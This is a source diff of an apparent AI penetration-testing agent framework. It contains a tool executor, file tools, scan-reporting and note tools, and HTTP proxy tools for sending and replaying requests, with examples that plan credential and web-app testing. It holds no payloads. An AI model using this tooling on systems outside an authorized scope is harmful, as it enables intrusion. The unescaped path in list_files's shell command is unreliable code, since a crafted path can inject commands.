async def execute_tool(tool_name: str, agent_state: Any | None = None, **kwargs: Any) -> Any:
execute_in_sandbox = should_execute_in_sandbox(tool_name)
sandbox_mode = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
if execute_in_sandbox and not sandbox_mode:
return await _execute_tool_in_sandbox(tool_name, agent_state, **kwargs)
return await _execute_tool_locally(tool_name, agent_state, **kwargs)
async def _execute_tool_in_sandbox(tool_name: str, agent_state: Any, **kwargs: Any) -> Any:
if not hasattr(agent_state, "sandbox_id") or not agent_state.sandbox_id:
raise ValueError("Agent state with a valid sandbox_id is required for sandbox execution.")
if not hasattr(agent_state, "sandbox_token") or not agent_state.sandbox_token:
raise ValueError(
"Agent state with a valid sandbox_token is required for sandbox execution."
)
if (
not hasattr(agent_state, "sandbox_info")
or "tool_server_port" not in agent_state.sandbox_info
):
raise ValueError(
"Agent state with a valid sandbox_info containing tool_server_port is required."
)
runtime = get_runtime()
tool_server_port = agent_state.sandbox_info["tool_server_port"]
server_url = await runtime.get_sandbox_url(agent_state.sandbox_id, tool_server_port)
request_url = f"{server_url}/execute"
request_data = {
"tool_name": tool_name,
"kwargs": kwargs,
}
headers = {
"Authorization": f"Bearer {agent_state.sandbox_token}",
"Content-Type": "application/json",
}
async with httpx.AsyncClient() as client:
try:
response = await client.post(
request_url, json=request_data, headers=headers, timeout=None
)
response.raise_for_status()
response_data = response.json()
if response_data.get("error"):
raise RuntimeError(f"Sandbox execution error: {response_data['error']}")
return response_data.get("result")
except httpx.HTTPStatusError as e:
if e.response.status_code == 401:
raise RuntimeError("Authentication failed: Invalid or missing sandbox token") from e
raise RuntimeError(f"HTTP error calling tool server: {e.response.status_code}") from e
except httpx.RequestError as e:
raise RuntimeError(f"Request error calling tool server: {e}") from e
async def _execute_tool_locally(tool_name: str, agent_state: Any | None, **kwargs: Any) -> Any:
tool_func = get_tool_by_name(tool_name)
if not tool_func:
raise ValueError(f"Tool '{tool_name}' not found")
converted_kwargs = convert_arguments(tool_func, kwargs)
if needs_agent_state(tool_name):
if agent_state is None:
raise ValueError(f"Tool '{tool_name}' requires agent_state but none was provided.")
result = tool_func(agent_state=agent_state, **converted_kwargs)
else:
result = tool_func(**converted_kwargs)
return await result if inspect.isawaitable(result) else result
def validate_tool_availability(tool_name: str | None) -> tuple[bool, str]:
if tool_name is None:
return False, "Tool name is missing"
if tool_name not in get_tool_names():
return False, f"Tool '{tool_name}' is not available"
return True, ""
async def execute_tool_with_validation(
tool_name: str | None, agent_state: Any | None = None, **kwargs: Any
) -> Any:
is_valid, error_msg = validate_tool_availability(tool_name)
if not is_valid:
return f"Error: {error_msg}"
assert tool_name is not None
try:
result = await execute_tool(tool_name, agent_state, **kwargs)
except Exception as e: # noqa: BLE001
error_str = str(e)
if len(error_str) > 500:
error_str = error_str[:500] + "... [truncated]"
return f"Error executing {tool_name}: {error_str}"
else:
return result
async def execute_tool_invocation(tool_inv: dict[str, Any], agent_state: Any | None = None) -> Any:
tool_name = tool_inv.get("toolName")
tool_args = tool_inv.get("args", {})
return await execute_tool_with_validation(tool_name, agent_state, **tool_args)
def _check_error_result(result: Any) -> tuple[bool, Any]:
is_error = False
error_payload: Any = None
if (isinstance(result, dict) and "error" in result) or (
isinstance(result, str) and result.strip().lower().startswith("error:")
):
is_error = True
error_payload = result
return is_error, error_payload
def _update_tracer_with_result(
tracer: Any, execution_id: Any, is_error: bool, result: Any, error_payload: Any
) -> None:
if not tracer or not execution_id:
return
try:
if is_error:
tracer.update_tool_execution(execution_id, "error", error_payload)
else:
tracer.update_tool_execution(execution_id, "completed", result)
except (ConnectionError, RuntimeError) as e:
error_msg = str(e)
if tracer and execution_id:
tracer.update_tool_execution(execution_id, "error", error_msg)
raise
def _format_tool_result(tool_name: str, result: Any) -> tuple[str, list[dict[str, Any]]]:
images: list[dict[str, Any]] = []
screenshot_data = extract_screenshot_from_result(result)
if screenshot_data:
images.append(
{
"type": "image_url",
"image_url": {"url": f"data:image/png;base64,{screenshot_data}"},
}
)
result_str = remove_screenshot_from_result(result)
else:
result_str = result
if result_str is None:
final_result_str = f"Tool {tool_name} executed successfully"
else:
final_result_str = str(result_str)
if len(final_result_str) > 10000:
start_part = final_result_str[:4000]
end_part = final_result_str[-4000:]
final_result_str = start_part + "\n\n... [middle content truncated] ...\n\n" + end_part
observation_xml = (
f"<tool_result>\n<tool_name>{tool_name}</tool_name>\n"
f"<result>{final_result_str}</result>\n</tool_result>"
)
return observation_xml, images
async def _execute_single_tool(
tool_inv: dict[str, Any],
agent_state: Any | None,
tracer: Any | None,
agent_id: str,
) -> tuple[str, list[dict[str, Any]], bool]:
tool_name = tool_inv.get("toolName", "unknown")
args = tool_inv.get("args", {})
execution_id = None
should_agent_finish = False
if tracer:
execution_id = tracer.log_tool_execution_start(agent_id, tool_name, args)
try:
result = await execute_tool_invocation(tool_inv, agent_state)
is_error, error_payload = _check_error_result(result)
if (
tool_name in ("finish_scan", "agent_finish")
and not is_error
and isinstance(result, dict)
):
if tool_name == "finish_scan":
should_agent_finish = result.get("scan_completed", False)
elif tool_name == "agent_finish":
should_agent_finish = result.get("agent_completed", False)
_update_tracer_with_result(tracer, execution_id, is_error, result, error_payload)
except (ConnectionError, RuntimeError, ValueError, TypeError, OSError) as e:
error_msg = str(e)
if tracer and execution_id:
tracer.update_tool_execution(execution_id, "error", error_msg)
raise
observation_xml, images = _format_tool_result(tool_name, result)
return observation_xml, images, should_agent_finish
def _get_tracer_and_agent_id(agent_state: Any | None) -> tuple[Any | None, str]:
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
agent_id = agent_state.agent_id if agent_state else "unknown_agent"
except (ImportError, AttributeError):
tracer = None
agent_id = "unknown_agent"
return tracer, agent_id
async def process_tool_invocations(
tool_invocations: list[dict[str, Any]],
conversation_history: list[dict[str, Any]],
agent_state: Any | None = None,
) -> bool:
observation_parts: list[str] = []
all_images: list[dict[str, Any]] = []
should_agent_finish = False
tracer, agent_id = _get_tracer_and_agent_id(agent_state)
for tool_inv in tool_invocations:
observation_xml, images, tool_should_finish = await _execute_single_tool(
tool_inv, agent_state, tracer, agent_id
)
observation_parts.append(observation_xml)
all_images.extend(images)
if tool_should_finish:
should_agent_finish = True
if all_images:
content = [{"type": "text", "text": "Tool Results:\n\n" + "\n\n".join(observation_parts)}]
content.extend(all_images)
conversation_history.append({"role": "user", "content": content})
else:
observation_content = "Tool Results:\n\n" + "\n\n".join(observation_parts)
conversation_history.append({"role": "user", "content": observation_content})
return should_agent_finish
def extract_screenshot_from_result(result: Any) -> str | None:
if not isinstance(result, dict):
return None
screenshot = result.get("screenshot")
if isinstance(screenshot, str) and screenshot:
return screenshot
return None
def remove_screenshot_from_result(result: Any) -> Any:
if not isinstance(result, dict):
return result
result_copy = result.copy()
if "screenshot" in result_copy:
result_copy["screenshot"] = "[Image data extracted - see attached image]"
return result_copy

View File

@@ -0,0 +1,4 @@
from .file_edit_actions import list_files, search_files, str_replace_editor
__all__ = ["list_files", "search_files", "str_replace_editor"]

View File

@@ -0,0 +1,141 @@
import json
import re
from pathlib import Path
from typing import Any, cast
from openhands_aci import file_editor
from openhands_aci.utils.shell import run_shell_cmd
from strix.tools.registry import register_tool
def _parse_file_editor_output(output: str) -> dict[str, Any]:
try:
pattern = r"<oh_aci_output_[^>]+>\n(.*?)\n</oh_aci_output_[^>]+>"
match = re.search(pattern, output, re.DOTALL)
if match:
json_str = match.group(1)
data = json.loads(json_str)
return cast("dict[str, Any]", data)
return {"output": output, "error": None}
except (json.JSONDecodeError, AttributeError):
return {"output": output, "error": None}
@register_tool
def str_replace_editor(
command: str,
path: str,
file_text: str | None = None,
view_range: list[int] | None = None,
old_str: str | None = None,
new_str: str | None = None,
insert_line: int | None = None,
) -> dict[str, Any]:
try:
path_obj = Path(path)
if not path_obj.is_absolute():
path = str(Path("/workspace") / path_obj)
result = file_editor(
command=command,
path=path,
file_text=file_text,
view_range=view_range,
old_str=old_str,
new_str=new_str,
insert_line=insert_line,
)
parsed = _parse_file_editor_output(result)
if parsed.get("error"):
return {"error": parsed["error"]}
return {"content": parsed.get("output", result)}
except (OSError, ValueError) as e:
return {"error": f"Error in {command} operation: {e!s}"}
@register_tool
def list_files(
path: str,
recursive: bool = False,
) -> dict[str, Any]:
try:
path_obj = Path(path)
if not path_obj.is_absolute():
path = str(Path("/workspace") / path_obj)
path_obj = Path(path)
if not path_obj.exists():
return {"error": f"Directory not found: {path}"}
if not path_obj.is_dir():
return {"error": f"Path is not a directory: {path}"}
cmd = f"find '{path}' -type f -o -type d | head -500" if recursive else f"ls -1a '{path}'"
exit_code, stdout, stderr = run_shell_cmd(cmd)
if exit_code != 0:
return {"error": f"Error listing directory: {stderr}"}
items = stdout.strip().split("\n") if stdout.strip() else []
files = []
dirs = []
for item in items:
item_path = item if recursive else str(Path(path) / item)
item_path_obj = Path(item_path)
if item_path_obj.is_file():
files.append(item)
elif item_path_obj.is_dir():
dirs.append(item)
return {
"files": sorted(files),
"directories": sorted(dirs),
"total_files": len(files),
"total_dirs": len(dirs),
"path": path,
"recursive": recursive,
}
except (OSError, ValueError) as e:
return {"error": f"Error listing directory: {e!s}"}
@register_tool
def search_files(
path: str,
regex: str,
file_pattern: str = "*",
) -> dict[str, Any]:
try:
path_obj = Path(path)
if not path_obj.is_absolute():
path = str(Path("/workspace") / path_obj)
if not Path(path).exists():
return {"error": f"Directory not found: {path}"}
escaped_regex = regex.replace("'", "'\"'\"'")
cmd = f"rg --line-number --glob '{file_pattern}' '{escaped_regex}' '{path}'"
exit_code, stdout, stderr = run_shell_cmd(cmd)
if exit_code not in {0, 1}:
return {"error": f"Error searching files: {stderr}"}
return {"output": stdout if stdout else "No matches found"}
except (OSError, ValueError) as e:
return {"error": f"Error searching files: {e!s}"}
# ruff: noqa: TRY300

View File

@@ -0,0 +1,128 @@
<tools>
<tool name="list_files">
<description>List files and directories within the specified directory.</description>
<parameters>
<parameter name="path" type="string" required="true">
<description>Directory path to list</description>
</parameter>
<parameter name="recursive" type="boolean" required="false">
<description>Whether to list files recursively</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - files: List of files and directories - total_files: Total number of files found - total_dirs: Total number of directories found</description>
</returns>
<notes>
- Lists contents alphabetically
- Returns maximum 500 results to avoid overwhelming output
</notes>
<examples>
# List directory contents
<function=list_files>
<parameter=path>/home/user/project/src</parameter>
</function>
# Recursive listing
<function=list_files>
<parameter=path>/home/user/project/src</parameter>
<parameter=recursive>true</parameter>
</function>
</examples>
</tool>
<tool name="search_files">
<description>Perform a regex search across files in a directory.</description>
<parameters>
<parameter name="path" type="string" required="true">
<description>Directory path to search</description>
</parameter>
<parameter name="regex" type="string" required="true">
<description>Regular expression pattern to search for</description>
</parameter>
<parameter name="file_pattern" type="string" required="false">
<description>File pattern to filter (e.g., "*.py", "*.js")</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - output: The search results as a string</description>
</returns>
<notes>
- Searches recursively through subdirectories
- Uses ripgrep for fast searching
</notes>
<examples>
# Search Python files for a pattern
<function=search_files>
<parameter=path>/home/user/project/src</parameter>
<parameter=regex>def\s+process_data</parameter>
<parameter=file_pattern>*.py</parameter>
</function>
</examples>
</tool>
<tool name="str_replace_editor">
<description>A text editor tool for viewing, creating and editing files.</description>
<parameters>
<parameter name="command" type="string" required="true">
<description>Editor command to execute</description>
</parameter>
<parameter name="path" type="string" required="true">
<description>Path to the file to edit</description>
</parameter>
<parameter name="file_text" type="string" required="false">
<description>Required parameter of create command, with the content of the file to be created</description>
</parameter>
<parameter name="view_range" type="string" required="false">
<description>Optional parameter of view command when path points to a file. If none is given, the full file is shown. If provided, the file will be shown in the indicated line number range, e.g. [11, 12] will show lines 11 and 12. Indexing at 1 to start. Setting [start_line, -1] shows all lines from start_line to the end of the file</description>
</parameter>
<parameter name="old_str" type="string" required="false">
<description>Required parameter of str_replace command containing the string in path to replace</description>
</parameter>
<parameter name="new_str" type="string" required="false">
<description>Optional parameter of str_replace command containing the new string (if not given, no string will be added). Required parameter of insert command containing the string to insert</description>
</parameter>
<parameter name="insert_line" type="string" required="false">
<description>Required parameter of insert command. The new_str will be inserted AFTER the line insert_line of path</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing the result of the operation</description>
</returns>
<notes>
Command details:
- view: Show file contents, optionally with line range
- create: Create a new file with given content
- str_replace: Replace old_str with new_str in file
- insert: Insert new_str after the specified line number
- undo_edit: Revert the last edit made to the file
</notes>
<examples>
# View a file
<function=str_replace_editor>
<parameter=command>view</parameter>
<parameter=path>/home/user/project/file.py</parameter>
</function>
# Create a file
<function=str_replace_editor>
<parameter=command>create</parameter>
<parameter=path>/home/user/project/new_file.py</parameter>
<parameter=file_text>print("Hello World")</parameter>
</function>
# Replace text in file
<function=str_replace_editor>
<parameter=command>str_replace</parameter>
<parameter=path>/home/user/project/file.py</parameter>
<parameter=old_str>old_function()</parameter>
<parameter=new_str>new_function()</parameter>
</function>
# Insert text after line 10
<function=str_replace_editor>
<parameter=command>insert</parameter>
<parameter=path>/home/user/project/file.py</parameter>
<parameter=insert_line>10</parameter>
<parameter=new_str>print("Inserted line")</parameter>
</function>
</examples>
</tool>
</tools>

View File

@@ -0,0 +1,4 @@
from .finish_actions import finish_scan
__all__ = ["finish_scan"]

View File

@@ -0,0 +1,174 @@
from typing import Any
from strix.tools.registry import register_tool
def _validate_root_agent(agent_state: Any) -> dict[str, Any] | None:
if (
agent_state is not None
and hasattr(agent_state, "parent_id")
and agent_state.parent_id is not None
):
return {
"success": False,
"message": (
"This tool can only be used by the root/main agent. "
"Subagents must use agent_finish instead."
),
}
return None
def _validate_content(content: str) -> dict[str, Any] | None:
if not content or not content.strip():
return {"success": False, "message": "Content cannot be empty"}
return None
def _check_active_agents(agent_state: Any = None) -> dict[str, Any] | None:
try:
from strix.tools.agents_graph.agents_graph_actions import _agent_graph
current_agent_id = None
if agent_state and hasattr(agent_state, "agent_id"):
current_agent_id = agent_state.agent_id
running_agents = []
stopping_agents = []
for agent_id, node in _agent_graph.get("nodes", {}).items():
if agent_id == current_agent_id:
continue
status = node.get("status", "")
if status == "running":
running_agents.append(
{
"id": agent_id,
"name": node.get("name", "Unknown"),
"task": node.get("task", "No task description"),
}
)
elif status == "stopping":
stopping_agents.append(
{
"id": agent_id,
"name": node.get("name", "Unknown"),
}
)
if running_agents or stopping_agents:
message_parts = ["Cannot finish scan while other agents are still active:"]
if running_agents:
message_parts.append("\n\nRunning agents:")
message_parts.extend(
[
f" - {agent['name']} ({agent['id']}): {agent['task']}"
for agent in running_agents
]
)
if stopping_agents:
message_parts.append("\n\nStopping agents:")
message_parts.extend(
[f" - {agent['name']} ({agent['id']})" for agent in stopping_agents]
)
message_parts.extend(
[
"\n\nSuggested actions:",
"1. Use wait_for_message to wait for all agents to complete",
"2. Send messages to agents asking them to finish if urgent",
"3. Use view_agent_graph to monitor agent status",
]
)
return {
"success": False,
"message": "\n".join(message_parts),
"active_agents": {
"running": len(running_agents),
"stopping": len(stopping_agents),
"details": {
"running": running_agents,
"stopping": stopping_agents,
},
},
}
except ImportError:
import logging
logging.warning("Could not check agent graph status - agents_graph module unavailable")
return None
def _finalize_with_tracer(content: str, success: bool) -> dict[str, Any]:
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
tracer.set_final_scan_result(
content=content.strip(),
success=success,
)
return {
"success": True,
"scan_completed": True,
"message": "Scan completed successfully"
if success
else "Scan completed with errors",
"vulnerabilities_found": len(tracer.vulnerability_reports),
}
import logging
logging.warning("Global tracer not available - final scan result not stored")
return { # noqa: TRY300
"success": True,
"scan_completed": True,
"message": "Scan completed successfully (not persisted)"
if success
else "Scan completed with errors (not persisted)",
"warning": "Final result could not be persisted - tracer unavailable",
}
except ImportError:
return {
"success": True,
"scan_completed": True,
"message": "Scan completed successfully (not persisted)"
if success
else "Scan completed with errors (not persisted)",
"warning": "Final result could not be persisted - tracer module unavailable",
}
@register_tool(sandbox_execution=False)
def finish_scan(
content: str,
success: bool = True,
agent_state: Any = None,
) -> dict[str, Any]:
try:
validation_error = _validate_root_agent(agent_state)
if validation_error:
return validation_error
validation_error = _validate_content(content)
if validation_error:
return validation_error
active_agents_error = _check_active_agents(agent_state)
if active_agents_error:
return active_agents_error
return _finalize_with_tracer(content, success)
except (ValueError, TypeError, KeyError) as e:
return {"success": False, "message": f"Failed to complete scan: {e!s}"}

View File

@@ -0,0 +1,45 @@
<tools>
<tool name="finish_scan">
<description>Complete the main security scan and generate final report.
IMPORTANT: This tool can ONLY be used by the root/main agent.
Subagents must use agent_finish from agents_graph tool instead.
IMPORTANT: This tool will NOT allow finishing if any agents are still running or stopping.
You must wait for all agents to complete before using this tool.
This tool MUST be called at the very end of the security assessment to:
- Verify all agents have completed their tasks
- Generate the final comprehensive scan report
- Mark the entire scan as completed
- Stop the agent from running
Use this tool when:
- You are the main/root agent conducting the security assessment
- ALL subagents have completed their tasks (no agents are "running" or "stopping")
- You have completed all testing phases
- You are ready to conclude the entire security assessment
IMPORTANT: Calling this tool multiple times will OVERWRITE any previous scan report.
Make sure you include ALL findings and details in a single comprehensive report.
If agents are still running, this tool will:
- Show you which agents are still active
- Suggest using wait_for_message to wait for completion
- Suggest messaging agents if immediate completion is needed
Put ALL details in the content - methodology, tools used, vulnerability counts, key findings, recommendations,
compliance notes, risk assessments, next steps, etc. Be comprehensive and include everything relevant.</description>
<parameters>
<parameter name="content" type="string" required="true">
<description>Complete scan report including executive summary, methodology, findings, vulnerability details, recommendations, compliance notes, risk assessment, and conclusions. Include everything relevant to the assessment.</description>
</parameter>
<parameter name="success" type="boolean" required="false">
<description>Whether the scan completed successfully without critical errors</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing success status and completion message. If agents are still running, returns details about active agents and suggested actions.</description>
</returns>
</tool>
</tools>

View File

@@ -0,0 +1,14 @@
from .notes_actions import (
create_note,
delete_note,
list_notes,
update_note,
)
__all__ = [
"create_note",
"delete_note",
"list_notes",
"update_note",
]

View File

@@ -0,0 +1,191 @@
import uuid
from datetime import UTC, datetime
from typing import Any
from strix.tools.registry import register_tool
_notes_storage: dict[str, dict[str, Any]] = {}
def _filter_notes(
category: str | None = None,
tags: list[str] | None = None,
priority: str | None = None,
search_query: str | None = None,
) -> list[dict[str, Any]]:
filtered_notes = []
for note_id, note in _notes_storage.items():
if category and note.get("category") != category:
continue
if priority and note.get("priority") != priority:
continue
if tags:
note_tags = note.get("tags", [])
if not any(tag in note_tags for tag in tags):
continue
if search_query:
search_lower = search_query.lower()
title_match = search_lower in note.get("title", "").lower()
content_match = search_lower in note.get("content", "").lower()
if not (title_match or content_match):
continue
note_with_id = note.copy()
note_with_id["note_id"] = note_id
filtered_notes.append(note_with_id)
filtered_notes.sort(key=lambda x: x.get("created_at", ""), reverse=True)
return filtered_notes
@register_tool
def create_note(
title: str,
content: str,
category: str = "general",
tags: list[str] | None = None,
priority: str = "normal",
) -> dict[str, Any]:
try:
if not title or not title.strip():
return {"success": False, "error": "Title cannot be empty", "note_id": None}
if not content or not content.strip():
return {"success": False, "error": "Content cannot be empty", "note_id": None}
valid_categories = ["general", "findings", "methodology", "todo", "questions", "plan"]
if category not in valid_categories:
return {
"success": False,
"error": f"Invalid category. Must be one of: {', '.join(valid_categories)}",
"note_id": None,
}
valid_priorities = ["low", "normal", "high", "urgent"]
if priority not in valid_priorities:
return {
"success": False,
"error": f"Invalid priority. Must be one of: {', '.join(valid_priorities)}",
"note_id": None,
}
note_id = str(uuid.uuid4())[:5]
timestamp = datetime.now(UTC).isoformat()
note = {
"title": title.strip(),
"content": content.strip(),
"category": category,
"tags": tags or [],
"priority": priority,
"created_at": timestamp,
"updated_at": timestamp,
}
_notes_storage[note_id] = note
except (ValueError, TypeError) as e:
return {"success": False, "error": f"Failed to create note: {e}", "note_id": None}
else:
return {
"success": True,
"note_id": note_id,
"message": f"Note '{title}' created successfully",
}
@register_tool
def list_notes(
category: str | None = None,
tags: list[str] | None = None,
priority: str | None = None,
search: str | None = None,
) -> dict[str, Any]:
try:
filtered_notes = _filter_notes(
category=category, tags=tags, priority=priority, search_query=search
)
return {
"success": True,
"notes": filtered_notes,
"total_count": len(filtered_notes),
}
except (ValueError, TypeError) as e:
return {
"success": False,
"error": f"Failed to list notes: {e}",
"notes": [],
"total_count": 0,
}
@register_tool
def update_note(
note_id: str,
title: str | None = None,
content: str | None = None,
tags: list[str] | None = None,
priority: str | None = None,
) -> dict[str, Any]:
try:
if note_id not in _notes_storage:
return {"success": False, "error": f"Note with ID '{note_id}' not found"}
note = _notes_storage[note_id]
if title is not None:
if not title.strip():
return {"success": False, "error": "Title cannot be empty"}
note["title"] = title.strip()
if content is not None:
if not content.strip():
return {"success": False, "error": "Content cannot be empty"}
note["content"] = content.strip()
if tags is not None:
note["tags"] = tags
if priority is not None:
valid_priorities = ["low", "normal", "high", "urgent"]
if priority not in valid_priorities:
return {
"success": False,
"error": f"Invalid priority. Must be one of: {', '.join(valid_priorities)}",
}
note["priority"] = priority
note["updated_at"] = datetime.now(UTC).isoformat()
return {
"success": True,
"message": f"Note '{note['title']}' updated successfully",
}
except (ValueError, TypeError) as e:
return {"success": False, "error": f"Failed to update note: {e}"}
@register_tool
def delete_note(note_id: str) -> dict[str, Any]:
try:
if note_id not in _notes_storage:
return {"success": False, "error": f"Note with ID '{note_id}' not found"}
note_title = _notes_storage[note_id]["title"]
del _notes_storage[note_id]
except (ValueError, TypeError) as e:
return {"success": False, "error": f"Failed to delete note: {e}"}
else:
return {
"success": True,
"message": f"Note '{note_title}' deleted successfully",
}

View File

@@ -0,0 +1,150 @@
<tools>
<tool name="create_note">
<description>Create a personal note for TODOs, side notes, plans, and organizational purposes during
the scan.</description>
<details>Use this tool for quick reminders, action items, planning thoughts, and organizational notes
rather than formal vulnerability reports or detailed findings. This is your personal notepad
for keeping track of tasks, ideas, and things to remember or follow up on.</details>
<parameters>
<parameter name="title" type="string" required="true">
<description>Title of the note</description>
</parameter>
<parameter name="content" type="string" required="true">
<description>Content of the note</description>
</parameter>
<parameter name="category" type="string" required="false">
<description>Category to organize the note (default: "general", "findings", "methodology", "todo", "questions", "plan")</description>
</parameter>
<parameter name="tags" type="string" required="false">
<description>Tags for categorization</description>
</parameter>
<parameter name="priority" type="string" required="false">
<description>Priority level of the note ("low", "normal", "high", "urgent")</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - note_id: ID of the created note - success: Whether the note was created successfully</description>
</returns>
<examples>
# Create a TODO reminder
<function=create_note>
<parameter=title>TODO: Check SSL Certificate Details</parameter>
<parameter=content>Remember to verify SSL certificate validity and check for weak ciphers
on the HTTPS service discovered on port 443. Also check for certificate
transparency logs.</parameter>
<parameter=category>todo</parameter>
<parameter=tags>["ssl", "certificate", "followup"]</parameter>
<parameter=priority>normal</parameter>
</function>
# Planning note
<function=create_note>
<parameter=title>Scan Strategy Planning</parameter>
<parameter=content>Plan for next phase: 1) Complete subdomain enumeration 2) Test discovered
web apps for OWASP Top 10 3) Check database services for default creds
4) Review any custom applications for business logic flaws</parameter>
<parameter=category>plan</parameter>
<parameter=tags>["planning", "strategy", "next_steps"]</parameter>
</function>
# Side note for later investigation
<function=create_note>
<parameter=title>Interesting Directory Found</parameter>
<parameter=content>Found /backup/ directory that might contain sensitive files. Low priority
for now but worth checking if time permits. Directory listing seems
disabled.</parameter>
<parameter=category>findings</parameter>
<parameter=tags>["directory", "backup", "low_priority"]</parameter>
<parameter=priority>low</parameter>
</function>
</examples>
</tool>
<tool name="delete_note">
<description>Delete a note.</description>
<parameters>
<parameter name="note_id" type="string" required="true">
<description>ID of the note to delete</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - success: Whether the note was deleted successfully</description>
</returns>
<examples>
<function=delete_note>
<parameter=note_id>note_123</parameter>
</function>
</examples>
</tool>
<tool name="list_notes">
<description>List existing notes with optional filtering and search.</description>
<parameters>
<parameter name="category" type="string" required="false">
<description>Filter by category</description>
</parameter>
<parameter name="tags" type="string" required="false">
<description>Filter by tags (returns notes with any of these tags)</description>
</parameter>
<parameter name="priority" type="string" required="false">
<description>Filter by priority level</description>
</parameter>
<parameter name="search" type="string" required="false">
<description>Search query to find in note titles and content</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - notes: List of matching notes - total_count: Total number of notes found</description>
</returns>
<examples>
# List all findings
<function=list_notes>
<parameter=category>findings</parameter>
</function>
# List high priority items
<function=list_notes>
<parameter=priority>high</parameter>
</function>
# Search for SQL injection related notes
<function=list_notes>
<parameter=search>SQL injection</parameter>
</function>
# Search within a specific category
<function=list_notes>
<parameter=search>admin</parameter>
<parameter=category>findings</parameter>
</function>
</examples>
</tool>
<tool name="update_note">
<description>Update an existing note.</description>
<parameters>
<parameter name="note_id" type="string" required="true">
<description>ID of the note to update</description>
</parameter>
<parameter name="title" type="string" required="false">
<description>New title for the note</description>
</parameter>
<parameter name="content" type="string" required="false">
<description>New content for the note</description>
</parameter>
<parameter name="tags" type="string" required="false">
<description>New tags for the note</description>
</parameter>
<parameter name="priority" type="string" required="false">
<description>New priority level</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - success: Whether the note was updated successfully</description>
</returns>
<examples>
<function=update_note>
<parameter=note_id>note_123</parameter>
<parameter=content>Updated content with new findings...</parameter>
<parameter=priority>urgent</parameter>
</function>
</examples>
</tool>
</tools>

View File

@@ -0,0 +1,20 @@
from .proxy_actions import (
list_requests,
list_sitemap,
repeat_request,
scope_rules,
send_request,
view_request,
view_sitemap_entry,
)
__all__ = [
"list_requests",
"list_sitemap",
"repeat_request",
"scope_rules",
"send_request",
"view_request",
"view_sitemap_entry",
]

View File

@@ -0,0 +1,101 @@
from typing import Any, Literal
from strix.tools.registry import register_tool
from .proxy_manager import get_proxy_manager
RequestPart = Literal["request", "response"]
@register_tool
def list_requests(
httpql_filter: str | None = None,
start_page: int = 1,
end_page: int = 1,
page_size: int = 50,
sort_by: Literal[
"timestamp",
"host",
"method",
"path",
"status_code",
"response_time",
"response_size",
"source",
] = "timestamp",
sort_order: Literal["asc", "desc"] = "desc",
scope_id: str | None = None,
) -> dict[str, Any]:
manager = get_proxy_manager()
return manager.list_requests(
httpql_filter, start_page, end_page, page_size, sort_by, sort_order, scope_id
)
@register_tool
def view_request(
request_id: str,
part: RequestPart = "request",
search_pattern: str | None = None,
page: int = 1,
page_size: int = 50,
) -> dict[str, Any]:
manager = get_proxy_manager()
return manager.view_request(request_id, part, search_pattern, page, page_size)
@register_tool
def send_request(
method: str,
url: str,
headers: dict[str, str] | None = None,
body: str = "",
timeout: int = 30,
) -> dict[str, Any]:
if headers is None:
headers = {}
manager = get_proxy_manager()
return manager.send_simple_request(method, url, headers, body, timeout)
@register_tool
def repeat_request(
request_id: str,
modifications: dict[str, Any] | None = None,
) -> dict[str, Any]:
if modifications is None:
modifications = {}
manager = get_proxy_manager()
return manager.repeat_request(request_id, modifications)
@register_tool
def scope_rules(
action: Literal["get", "list", "create", "update", "delete"],
allowlist: list[str] | None = None,
denylist: list[str] | None = None,
scope_id: str | None = None,
scope_name: str | None = None,
) -> dict[str, Any]:
manager = get_proxy_manager()
return manager.scope_rules(action, allowlist, denylist, scope_id, scope_name)
@register_tool
def list_sitemap(
scope_id: str | None = None,
parent_id: str | None = None,
depth: Literal["DIRECT", "ALL"] = "DIRECT",
page: int = 1,
) -> dict[str, Any]:
manager = get_proxy_manager()
return manager.list_sitemap(scope_id, parent_id, depth, page)
@register_tool
def view_sitemap_entry(
entry_id: str,
) -> dict[str, Any]:
manager = get_proxy_manager()
return manager.view_sitemap_entry(entry_id)

View File

@@ -0,0 +1,267 @@
<?xml version="1.0" ?>
<tools>
<tool name="list_requests">
<description>List and filter proxy requests using HTTPQL with pagination.</description>
<parameters>
<parameter name="httpql_filter" type="string" required="false">
<description>HTTPQL filter using Caido's syntax:
Integer fields (port, code, roundtrip, id) - eq, gt, gte, lt, lte, ne:
- resp.code.eq:200, resp.code.gte:400, req.port.eq:443
Text/byte fields (ext, host, method, path, query, raw) - regex:
- req.method.regex:"POST", req.path.regex:"/api/.*", req.host.regex:".*.com"
Date fields (created_at) - gt, lt with ISO formats:
- req.created_at.gt:"2024-01-01T00:00:00Z"
Special: source:intercept, preset:"name"</description>
</parameter>
<parameter name="start_page" type="integer" required="false">
<description>Starting page (1-based)</description>
</parameter>
<parameter name="end_page" type="integer" required="false">
<description>Ending page (1-based, inclusive)</description>
</parameter>
<parameter name="page_size" type="integer" required="false">
<description>Requests per page</description>
</parameter>
<parameter name="sort_by" type="string" required="false">
<description>Sort field from: "timestamp", "host", "status_code", "response_time", "response_size"</description>
</parameter>
<parameter name="sort_order" type="string" required="false">
<description>Sort direction ("asc" or "desc")</description>
</parameter>
<parameter name="scope_id" type="string" required="false">
<description>Scope ID to filter requests (use scope_rules to manage scopes)</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- 'requests': Request objects for page range
- 'total_count': Total matching requests
- 'start_page', 'end_page', 'page_size': Query parameters
- 'returned_count': Requests in response</description>
</returns>
<examples>
# POST requests to API with 200 responses
<function=list_requests>
<parameter=httpql_filter>req.method.eq:"POST" AND req.path.cont:"/api/"</parameter>
<parameter=sort_by>response_time</parameter>
<parameter=scope_id>scope123</parameter>
</function>
# Requests within specific scope
<function=list_requests>
<parameter=scope_id>scope123</parameter>
<parameter=sort_by>timestamp</parameter>
</function>
</examples>
</tool>
<tool name="view_request">
<description>View request/response data with search and pagination.</description>
<parameters>
